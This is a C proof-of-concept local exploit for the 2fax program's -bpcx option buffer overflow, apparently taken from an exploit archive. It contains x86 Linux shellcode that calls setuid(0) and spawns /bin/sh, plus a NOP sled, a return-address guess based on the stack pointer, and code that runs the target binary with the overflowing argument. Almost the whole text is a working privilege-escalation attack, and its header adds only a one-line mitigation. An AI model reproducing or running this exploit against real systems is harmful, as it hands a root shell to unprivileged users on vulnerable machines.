2fax -bpcx option local exploit for Linux.
ebae72f5d4e6a1ffe3acb022e81f8c0f51e05a3a4c47eaa2b903e3d2c92066ef
/*******************************************************************************
* *
* 2fax local PoC exploit *
* by Crazy Einstein [crazy_einstein@yahoo.com], Limpid Byte [lbyte.void.ru] *
* *
* Bug: Buffer Overflow in -bpcx option *
* Homepage of 2fax: http://www.atbas.org/ *
* *
* Solution: Don't set suid bit to 2fax program *
* *
*******************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#define MAX_SIZE 350
#define OFFSET -1100
#define tmpfile "/tmp/abcde0987654"
/* shellcode for Linux x86 by Grange */
char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/bin/sh";
long getesp() {
__asm__("movl %esp,%eax");
}
void usage(int argc, char **argv) {
printf("Local exploit for 2fax program (<= v2.02)\n by Crazy Einstein [crazy_einstein@yahoo.com], Limpid Byte [lbyte.void.ru]\n\n"
"Usage: %s </path/to/2fax> [offset]\n\n",argv[0]);
return;
}
int main(int argc,char **argv) {
char buf[MAX_SIZE], buf2[MAX_SIZE + 20], faxpath[100], *p, tmpexec[200];
int offset = OFFSET;
long ret;
if(argc<2) { usage(argc,argv); exit(-1); }
strcpy(faxpath,argv[1]);
if(argv[2]) offset=atoi(argv[2]);
bzero(buf,sizeof(buf));
bzero(buf2,sizeof(buf2));
ret=getesp()-offset;
printf("ret: 0x%x, offset: %d\n",ret,offset);
memset(buf,0x90,312-strlen(shellcode));
strcat(buf,shellcode);
strcat(buf,"AAAAAAAAAAAAAAAA");
while( (p=(char *)strstr(buf,"AAAA")) != NULL ) *(long*)p=ret;
sprintf(buf2,"-bpcx:%s",buf);
sprintf(tmpexec,"touch %s;rm -rf %s",tmpfile,tmpfile);
system(tmpexec);
execl(faxpath,faxpath,buf2,tmpfile,tmpfile,NULL);
return 0;
}